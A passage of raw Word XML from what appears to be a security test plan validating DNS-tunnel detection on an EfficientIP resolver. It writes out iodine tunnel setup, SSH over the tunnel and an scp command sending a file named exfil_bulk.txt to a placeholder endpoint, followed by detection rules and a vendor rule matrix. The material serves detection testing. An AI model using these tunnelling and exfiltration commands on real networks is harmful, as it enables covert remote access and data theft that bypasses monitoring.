        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> iodine -f -P </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>your_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">_SRV </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>t.CUSTOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_DOMAIN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38A3A15B"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This tells iodine to send DNS queries to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EfficientIP's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7871EAC2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="36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EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> forwards them to colleague's authoritative server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548185A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79DB028B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:t>Once connected, verify the tunnel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD8422" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Check the tunnel interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C2ED15" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ifconfig dns0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E2B93" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># You should see 10.0.0.2 (client side of tunnel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA8449" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA1D535" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Ping the server through the tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D59A6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ping 10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE517D6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D0411D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># SSH through the tunnel (full remote access over DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615EBD3D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> user@10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8EC6D9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226F25B6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Transfer a file through the tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D067768" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> exfil_bulk.txt user@10.0.0.1:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FA4C7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05013186" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What to Expect from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="19D5A33F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Massive volume of DNS queries to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>t.CUSTOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_DOMAIN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — hundreds or thousands per minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E458E4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Very large query and response sizes (iodine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maximises</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DNS payload per query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32F4B9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>NULL record ty</w:t>
      </w:r>
      <w:r>
        <w:t>pe queries (uncommon in normal traffic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE34B80" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Continuous, uninterrupted traffic flow — unlike any legitimate DNS pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD455B9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>This is the most obvious tunnel to detect by volume alone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E98D85" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE71622" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detection Rules Required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B2212" w14:paraId="4EDE9B66" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="6B4908FD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="6BEACED0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="2A0CF9F9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6D00308E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4CFC7F01" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E13a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0DA1393C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS tunnel — volume anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7D1D6D8A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Same source + same base domain + &gt;100 queries/min sustained for &gt;2 minutes → ALERT + BLOCK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="72951FD3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B53A74E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E13b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="13462E96" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>NULL record type detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0675DC67" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Any NULL record query from an endpoint → ALERT (NULL records have virtually no legitimate use)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="4621BC0C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5DF2DBA2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E13c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="48E0CAF7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Oversized DNS payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="72D73BE5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Query or response payload &gt;512 bytes to external domain → ALERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1737FBF1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C90F63" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. Detection Rule Matrix — Complete Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116023B5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Hand this table to the vendor. Each row is a detection rule that must be implemented, tested, and forwarding alerts to Splunk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304688F5"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5B2212" w14:paraId="7C7CD036" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="1D00ED4E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="479C9C0E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="5E1BB34E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Trigger Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="67BA9897" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Tests Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="446714EE" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
